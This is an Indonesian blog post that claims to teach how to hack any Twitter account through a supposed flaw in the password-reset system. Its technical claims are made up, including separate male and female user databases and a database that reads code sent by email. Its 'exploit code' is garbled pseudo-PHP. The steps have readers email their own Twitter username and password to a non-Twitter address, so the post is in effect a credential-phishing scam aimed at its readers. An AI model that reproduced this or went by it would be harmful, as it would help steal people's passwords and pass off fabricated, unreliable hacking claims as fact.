CARA KERJA HACKING TWITTER
Twitter memiliki dua database (satu
untuk pria dan satu untuk pengguna perempuan) di mana mereka menyimpan
semua informasi dari pengguna mereka, jika Anda ingat email yang Anda
gunakan untuk login namun lupa sandi, Anda dapat menggunakan 'Lupa kata
sandi Anda?' pilihan, namun jika seperti saya Anda tidak memiliki
informasi yang tidak mungkin untuk memulihkan hukum account tersebut.
Jika Anda tahu apa-apa tentang website
pemrograman Anda tahu 'Lupa kata sandi Anda?' berada dalam kontak
langsung dengan database untuk mengirim permintaan untuk mengambil
informasi yang terlupakan untuk Anda, pada dasarnya apa artinya adalah
jika Anda bertanya 'database untuk informasi yang login dengan' kode
'hak (dalam kasus kami mengeksploitasi ), itu akan mengirimkan kembali
informasi tersebut.
Jadi semua saya harus mencari tahu
adalah apa kode dan apa sistem yang mereka digunakan untuk menghubungi
database melalui 'Lupa kata sandi Anda?' layanan, setelah beberapa
minggu menulis dan menguji kode saya datang dengan orang yang tepat
untuk pekerjaan itu dan setelah melakukan sedikit riset saya belajar
Twitter menggunakan sesuatu yang mirip dengan layanan email untuk
menghubungi database mereka.
Tapi seperti biasa, semuanya tidak
semudah tampaknya. Untuk alasan keamanan database diprogram untuk
memverifikasi account Anda meminta adalah benar kepunyaan Anda dan tidak
seseorang elses sehingga mereka membutuhkan beberapa jenis otentikasi
atau verifikasi (thats mengapa mereka mengirimkan link verifikasi ke
email Anda saat membuat account Anda atau mengubah password Anda) ,
untungnya bagi kami Twitter begitu buruk diprogram mereka juga
memungkinkan Anda untuk menggunakan teman / pengikut account untuk
memverifikasi sendiri (itu kesalahan dalam layanan "Teman Reksa /
Pengikut" di mana mereka mengotentikasi account dengan memeriksa jika
terkait teman / email pengikut terkait dengan account 'korban'), dengan
kata lain, jika orang yang Anda ingin mendapatkan informasi login dari
yang mengikuti Anda di Twitter dan mengikuti mereka ... Anda Anda dapat
menggunakan akun Anda sendiri untuk memverifikasi mereka (dengan
membingungkan database ke dalam berpikir kita memeriksa apakah Anda
berdua saling mengikuti satu sama lain daripada tindakan yang benar
reseting password mereka dan membuat mereka kirim pada kami) dan
mendapatkan login email dan password yang dikirim ke Anda ... tapi
korban harus mengikuti Anda dan Anda mereka
CARA MELAKUKANNYA
1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?
Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini
Menuliskannya di suatu tempat karena
Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu
dilakukan Anda dapat melanjutkan ke langkah 2.
2) Di bagian bawah halaman ini saya
telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini
adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri
Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login
korban .
Gulir ke bawah ke bagian bawah halaman
ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga
Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan
CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks
sehingga Anda dapat mengeditnya.
3) Setelah Anda memiliki kode di suatu
tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga
hal ke dalamnya, username twitter korban dan otentikasi informasi teman
login. Saya akan memberikan contoh langkah demi langkah dengan mencoba
memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian
mana Anda harus mengedit dan dengan apa:
Untuk Lebih Jelas nya Silahkan di Klik untuk Di Perbesar
1. Harus username korban.
2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.
Saat mengedit kode, tidak sengaja
menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi
pastikan Anda menaruh informasi di dalamnya.
4) Sekarang bahwa Anda memiliki kode
eksploitasi diedit dan siap untuk dikirim, kami siap untuk
mengirimkannya ke database melalui email, karena bukan email biasa Anda,
tetapi email mengeksploitasi kita harus menggunakan Subyek khusus
sehingga database tahu bagaimana membaca dalam bahasa pemrograman.
Ke alamat email Anda dan Compose email
baru untuk twittersupport@techie.com yang twitters pelanggan layanan
email untuk password lupa, dalam salinan Subyek dan paste kode di bawah
ini
$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();
Setelah Anda mengedit Subjek dan
memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar
di bawah, saya akan berhitung setiap item:
1. Alamat email dari layanan pelanggan lupa database twitter itu password.
2. Di sinilah Anda memasukkan username korban.
3. Di sinilah Anda memasukkan jenis
kelamin korban (seperti yang disebutkan di atas database twitter terbagi
dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika
mereka adalah laki-laki atau F jika mereka adalah perempuan.
5) Setelah Anda benar ditulis Kepada:
dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode
exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email.
Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database
untuk mengirimkan kembali jawaban itu dengan informasi.
Ini harus mengambil dari 12-24 jam
tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh
dari respon email Anda akan menerima:
Untuk Lebih Jelas nya Silahkan di Klik untuk Di Perbesar
THE EXPLOIT CODE
twt_select_db("find", $linkID) or
die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM
signup WHERE email = '$email'", $linkID) or die(twt_database_error());
$num_rows = db_num_rows($resultID); $row =
twitter_fetch_array($resultID); $user_id = $row[0];
if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."
$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email
session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {
}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while
($i <= 7) { $num = decrypt() % 33; $tmp = substr($salt, $num, 1);
$pass = $pass . $tmp; $i++; } return $pass; } mail($email_address,
$subject, $message, "Twitter Password Reset Confirmation } /end$
Semoga Bermanfaat ya GAN
![Cara Hack Twitter Tanpa Software Terbaru 2013 100% Berhasil [Pastiterpantau.blogspot.com]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihTA4Od_kgYI_EKGvk2nNZ3yl3mp-ZViE7uGPddqcLNvB7I92-zfUIWZspW_x_vZha0ZCagidBDuPvXQRTONm5jL6EJgJa8oJkyyVJDEavEkcbrRZ1ZVuv6xZ-lRcokM9v0y72FMY-MHo/s1600/url.jpg "Cara Hack Twitter Tanpa Software Terbaru 2013 100% Berhasil [Pastiterpantau.blogspot.com]"){kind=small}
![Cara Hack Twitter Tanpa Software Terbaru 2013 100% Berhasil [Pastiterpantau.blogspot.com]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrQXQ99T8xH8nXNmXWs2uGBGtNvAh8MvNRUweZ1VnJgjgWNV5LtvKiD62TQ_r2sdq4_Gve9aC7Eep7ocR9ejmg8FlIVThbPOLxg601j0yZ2M71bqs7q42X0o0CC6hOXAcoEqi4uFrlel8/s1600/eg.jpg "Cara Hack Twitter Tanpa Software Terbaru 2013 100% Berhasil [Pastiterpantau.blogspot.com]")
